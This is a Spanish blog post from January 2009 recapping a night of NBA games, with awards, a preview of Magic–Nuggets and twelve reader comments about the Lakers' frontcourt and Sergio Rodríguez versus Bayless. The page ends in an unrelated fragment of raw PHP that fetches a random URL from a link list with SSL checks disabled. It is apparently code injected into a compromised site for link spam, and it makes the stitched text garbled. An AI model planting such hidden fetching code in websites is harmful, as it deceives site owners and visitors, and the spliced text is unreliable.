La crónica (16/1/2009)

17 de January de 2009 por Jabho

No nos gustan los jueves pero nos molan los viernes. Muchos partidos de todo tipo y condición, y jornadas que siempre nos dejan grandes actuaciones, bluffs y alguna que otra sorpresa.  Sé que es muy ventajista, pero anoche teníamos 3 razones para trasnochar y el resultado es Este 3 – Oeste 0. Estamos en el ecuador de la liga y aunque hay margen de mejora, y de empeorar claro, algunos se quedan sin tiempo y sin confianza por nuestra parte. Empezamos:

Los Sixers son uno de los equipos de moda. Anoche ganaron a los Spurs y llevan 6 seguidas para rozar el 50% de victorias. A base de correr, de un Young tremendo anoche y bien acompñado por Iguodala, parecen haber salido de la crisis y miran de cerca los Play Offs. La 4ª plaza del Este está a su alcanze si siguen en esta línea. En el horizonte Brand “amenaza” con estar casi recuperado y volver en breve. Los de San Antonio venían de ganar a los Lakers y anoche jugaron un mal partido, pero como decíamos el otro día no hay que dudar de ellos.

Seguíamos la noche con 2 equipos que antes de empezar el año eran claros outsiders al título, Cavaliers y Hornets. La primera mitad de liga ha confirmado a Cleveland pero nos deja dudas sobre los Hornets. Anoche ganaron los Cavs sin dos titulares, Ilgauskas y West, tirando un pelín mas de lebronsistema de lo habitual y apoyados por el buen acierto desde la línea de 3 puntos. Los Hornets echan mucho de menos la solvencia que les daba Chandler bajo los tableros y que este año no anda fino. Paul y Posey fueron expulsados por 2 técnicas en los últimos minutos.

En el tercer duelo entre aspirantes al títulos, Lakers y Magic, nos fijábamos en el duelo en la zona. El resultado es Howard 1 –  Gasol/Bynum 0. De la mano del dominio de Howard de la zona y con un gran Nelson en la dirección, los Magic ganaron a los angelinos que no hicieron un buen partido. Los Magic son uno de los 4 equipos que han pasado las 30 victorias en la primera mitad y se postulan como el otro equipo, junto con Sixers, más en forma del momento.  Los Lakers encadenan dos derrotas seguidas, que visto el balance y el calendario tienen la importancia que tienen, poca. A su favor sigue que el liderato de la conferencia no corre ningún peligro. No estaría de mas que alguno, Vujacic va por tí, espabilara ahora que las lesiones han limitado el banco amarillo.

Seguimos con el resto de la jornada. Los Raptors perdieron en Indiana con un mal Jermaine, suena para los Bulls, y un buen Dunleavy. Toronto es uno de los que se queda sin tiempo y sin confianza… Apuesto porque habrá cambios.

Los Knicks se tiraron los últimos 4 minutos casi sin anotar, cosa que aprovecharon lo Wizards para ganar el partido. Suena muy fuerte lo de Sergio y los Knicks y, aunque tengo mis dudas, ójala salga. Espacio para correr y atacar tendría de sobra, aunque no es fácil jugar en un equipo que  muchas veces parace perder el norte.

Dos de sorpresas: Los Thunder con un Durant inspiradísimo, ¡¡¡All Star!!!, y un buen Wilcox ganaron a los Pistons. 2ª victoria seguida y dejar la cuchara de madera en manos de otro está mas cerca. Los Wolves vencieron a los Suns, esta vez con Shaq, y se asientan como el menos malo de los que no luchan por los Play Offs en el Oeste. Los Suns a un partido semanal serían claros candidatos pero ni Shaq, ni Nash, ni algún otro estan para jugar tantos partidos.

Bucks y Kings se dieron un festival de puntos que se llevaron los de Milwaukee, que de paso saca por el momento a los Nets de puestos de honor. Y también con festival de puntos ganaron los Warriors a los Hawks donde Marvin Williams salió lesionado. Echan de menos en Atlanta al dominicano Horford. Los Warriors por contra recuperaron al capi Jackson y se notó.

Cerramos con la victoria de Deron y sus Jazz a OJ Mayo y sus Grizzlies con dobles figuras para Marc, 12 puntos y 10 rebotes. Jugó Miles su 10º partido con unos números decentes de 10 puntos y 7 rebotes en 14 minutos. Que vayan contando los billetes en Porland.

PREMIOS

MVP: Destacan los buenos partidos de los habituales Durant, James y Howard. Me quedo para el MVP, aunque con alguna duda, con los 44 puntos de Redd en la victoria de los Bucks. Personalmente me gustan más actuaciones que aun con menos puntos aporten en otros conceptos del juego, pero no dejo de reconocer que los 44 puntos de Redd con sus porcentajes y viviendo como vive a gran distancia de la canasta tiene mucho mérito. Howard y su 25-20 contra los Lakers… ¿comparten premio?

El rookie: Y es que estas noches dan para mucho. Otro compartido para uno que ganó, Love con 13 puntos y 14 rebotes ante Shaq y Amare, y uno que perdió, Thompson con 22 puntos y 11 rebotes con buenos porcentajes y muchas faltas forzadas.

La sorpresa: La lesión de West le dejó el puesto de titular por primera vez este año a Pavlovic y  cumplió de sobra con 19 puntos y 6 rebotes. También destacó de nuevo Carney en la victoria de los Wolves.

La decepción: Para el mal partido de los Pistons en general y de Stuckey en particular. Destacado por hacerlo bien otros días, cuando no te entran no te empeñes.

El mayor esfuerzo en vano: Para uno poco habitual aqui, Kobe Bryant. Anoche triple-doble con 28 puntos, 11 asistencias y 13 rebotes pero derrota.

RAZONES PARA TRASNOCHAR

Tenemos un buen partido esta noche sin trasnochar, el Celtics-Nets a las 19:00 hora española, pero como “partido de la jornada” nos quedamos con:

Magic@Nuggets: Se enfrentan los segundos de ambas conferencias y ambos han gando 8 de sus últimos 10 partidos. A ninguno lo esparábamos tan arriba pero ahí estan y en el caso de los Denver con Melo lesionado. Interesante duelo en la dirección entre Nelson y Billups… duro hueso para el de Orlando.

Y el jugador al que conviene seguir de cerca es… Dwight Howard, de nuevo. Y es que si ayer era la vara de medir a Bynum hoy se medirá con Nenê que está jugando una gran temporada y es uno de los “motivos” de Denver.

Comenta

12 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Los Lakers necesitan recuperar a los lesionados y a poder ser fichar un interior veterano y defensivo. Salvo en las derrotas contra Sacramento y Miami, en los otros partidos perdidos nos han destrozado tios como Sheed, Murphy, Nesterovic, Howard, Duncan y West.

    No me preocupa mucho, pero un poco si.

      Citar

  2. RusticoColorao dice:
    #2

    Hombre, La temporada de Bynum está siendo flojilla. A mi dos de los equipos que más me gusta como juegan son Miami (aprovecha muy bien lo que tiene, buena pinta tiene su entrenador) y Milwaukee (buena plantilla y hay que reconocer que Skiles sabe lo que hace… aunque no lo puedo ni ver). Aún así hay equipos a los que todavía no he podido ver.

      Citar

  3. Jabho dice:
    #3

    Pues a mi los Bucks no me dicen absolutamente nada. Creo como tu que Skiles es un entrenador correcto. Pero sin alardes, que van 8º y tampoco están haciendo un temporadon. De los jugadores que tienen ni Redd, Jefferson, Villanueba o Bogut me apasionan… Son buenos pero a todos les falta algo (quizás el mejor es Bogut) para poder hacer un equipo competitivo.

    Los Heat estoy mas de acuerdo contigo. Son un equipo con unas limitaciones tremendas, con un rookie de 2ª ronda de base titular, sin base reserva y sin ningún jugador grande que pueda cumplir medianamente… Y aun con eso están bien clasificados. Claro que la temporada de Wade ayuda, la verdad.

    Bynum como dices temporada flojilla. Esperemos que mejore y que no se eche a perder trás la extensión firmada.

    Como dice Viva la mayor carencia de los Lakers está ahí desde la final del año pasado: un interior capaz de pelear duro.

      Citar

  4. Txusma dice:
    #4

    Ayer puede ver un ratito de NBA, concretamente trozos del Raptors – Pacers y el Hornets – Cavs. Los Raptors es complicado saber a lo q juegan y aunq Barniani lleve unos partidos buenos ayer me dejo mas bien frio. Sigo pensando q aunq Calderon no este haciendo una grandisima temporada es la pieza que engrana el resto de la maquinaria. Ah! Lo de O’Neal defenitivamente no les ha salido bien. Enfrente un equipo correcto con un Granger simplemente espectacular. Me encanta este jugador pq esta a todas: penetraciones, triples, media distancia, rebotea, asiste, lidera… All-Stars si o si. Ademas un trio de jugador q son toda una amenaza exterior como Dunleavy, Murphy y Ford. Cuando se recupere Daniels puede dar un buen salto cualitativo pq les falta un punto de defensa.
    Y en el otro partido los Hornets me decepcionaron enormemente y sobretodo David West. Seguro q pille el partido malo pero creo q no le vi correr en ninguna momento. Se paseaba por la zona rival andando sin buscar para nada jugar por dentro y siempre abriendose para utilizar este tirito de 4-5 metros tan bueno que tiene. Si le entran bien, pero si no, es incapaz de maquillar sus estadisticas a base de rebotes y asistencias. En los Cavs, 2 vs 1 a Lebron, aprovechados fantasticamente por Pavlovic, Williams y Szcerbiack desde la linea de tres. Con Ilgauskas deben ser la leche pq ayer jugaban con Varejao (q horrible inicio de partido) y Ben q no esta para mucho ya…

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Tremendo lo que pone en acb.com hoy

    “Planeta Americano
    Planeta Americano se centra en Orlando Magic, con una racha de seis victorias y el récord de triples. Calderón sigue infalible desde la personal mientras su equipo no levanta cabeza. Además, no te pierdas el resumen de la madrugada NBA”

    Sin haber Calderón, tremenda tal frase.

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    Sin haber jugado,,quería decir.

      Citar

  7. El_Pecharroman dice:
    #7

    Estoy viendo el Portland – Charlotte y la verdad es que… Rudy más bien flojo, aunque con buenas actuaciones en los momentos finales. Y Sergio, aunque lo ha hecho bien (5 asistencias sin pérdida, 10 puntos… ¡1 tapón!), no ha terminado de arrancar. Bayless le ha ganado un tanto la mano, siquiera por el acierto en el tiro; aunque le falta mucho arte de playmaker para ser mejor que nuestro canario.

    Para mí, y me voy a mojar muchísimo, ahora mismo Sergio no tiene demasiado sitio en Portland. Blake tiene más confianza, Roy a veces hace funciones de base, Bayless es más malo pero lo tienen mejor considerado. Lo mejor que puede hacer el “nuestro” es irse a otro lugar donde su estilo se adapte mejor, un lugar donde la estrella sea un gran tirador o un point-forward de muñeca prodigiosa y buen contragolpe. Donde él pueda repartir juego, que al fin y al cabo es lo que mejor hace, y gozar de confianza del cuerpo técnico. Creo que a Portland ya le ha dado todo lo que tenía que darle.

      Citar

  8. Txusma dice:
    #8

    Y en q nos basamos para decir que Bayless es mas malo? Tengamos en cuenta q este es el primer año de Bayless y en cambio Sergio lleva ya unos cuantos.

      Citar

  9. El_Pecharroman dice:
    #9

    @ Txusma

    Como base, Bayless es peor que Sergio. Yo considero que el 5 debe ser sobre todo un playmaker (asistente), siendo la anotación, el robo de balón e incluso el rebote factores secundarios. Mirando estadísticas, Sergio lleva el triple de asistencias (3’3) que Bayless (1’1). En puntos, Bayless es ligeramente mejor (4’1 Sergio, 4’5 Jerryd). En rebotes no hay diferencias significativas, en porcentajes tampoco aunque en los dos últimos partidos Bayless lleva un 66 % de acierto por un 46 % de Sergio. Esta sería mi argumentación.

      Citar

  10. Txusma dice:
    #10

    Podemos estar de acuerdo en q Bayless no es un base, al menos un base como Sergio, pero de ahi a decir q es mas malo creo q va un trecho, principalmente pq a lo mejor Sergio ha jugado muy poquito esta temporada pero Bayless lo ha hecho aun menos. Bayless es el tipico 2 con un cuerpo de 1, muy rapido y que necesita bastante balon. Ahora mismo con Roy en el equipo eso es imposible…

      Citar

  11. Kantonyo dice:
    #11

    Yo creo que es pronto para decir si Bayless es malo, bueno, mejor o peor que Sergio.

    Lo que está claro es que Jerryd va a tener de más oportunidades que el español. No me imagino al chacho teniendo el perdón de McMillan despues de una actuación de 1 de 11 en tiros de campo y 2 perdidas en solo 25 minutos.

    Somos demasiado exigentes con Sergio, yo no creo que lo esté haciendo tan mal, yo prefiero ver a Sergio jugando 15 minutos de media en la NBA con 22 años, que verle en la ACB. Ya tendrá tiempo de volver. Aunque lo hiciera con 26 años, tendría otros 8 para jugar a buen nivel en la ACB. Creo que si aguanta el tipo puede convertirse en un pedazo de base. No todos tienen la personalidad para triunfar con 20 años, hay algunos que deben coger confianza poco a poco, y creo que es el caso de Sergio.

    Mucho talento pero poco caracter, por eso creo que la mejor forma de crecer es poco a poco…

      Citar

  12. MagicJohnson32 dice:
    #12

    Sobre la carencia que comentáis de los Lakers, es cierto. Encajan demasiadas canastas fáciles bajo el aro sin que ninguno de los interiores se digne a intimidar lo más mínimo. Pau ni lo ha hecho nunca ni lo hará. Y Bynum lo hace sólo cuando el penetrador le encara directamente, pero nunca en ayudas desde el lado débil y cosas así. Drew tiene el potencial y la juventud para convertirse en una presencia defensiva. Creo que sólo le falta la mentalidad, porque pierde la concentración con demasiada facilidad.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>